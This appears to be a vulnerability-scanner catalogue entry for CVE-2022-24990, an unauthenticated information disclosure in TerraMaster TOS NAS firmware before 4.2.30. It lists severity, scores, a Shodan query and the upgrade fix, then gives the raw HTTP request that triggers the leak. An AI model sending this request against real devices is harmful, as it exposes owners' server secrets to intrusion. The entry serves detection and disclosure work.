| Title | TerraMaster TOS < 4.2.30 Server Information Disclosure |
|---|---|
| Author | dwisiswant0 |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to gain sensitive information about the server, potentially leading to further attacks. |
| Remediation | Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.94284 |
| CVE ID | CVE-2022-24990 |
| CWE ID | CWE-306 |
| Shodan Query | TerraMasterterramaster |
| Tags | cve cve2022 packetstorm terramaster exposure kev terra-master vkev vuln |
TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.
GET /module/api.php?mobile/webNasIPS HTTP/1.1
Host: www.victim.com
User-Agent: TNAS
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24990.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-24990.pcap
N/AN/A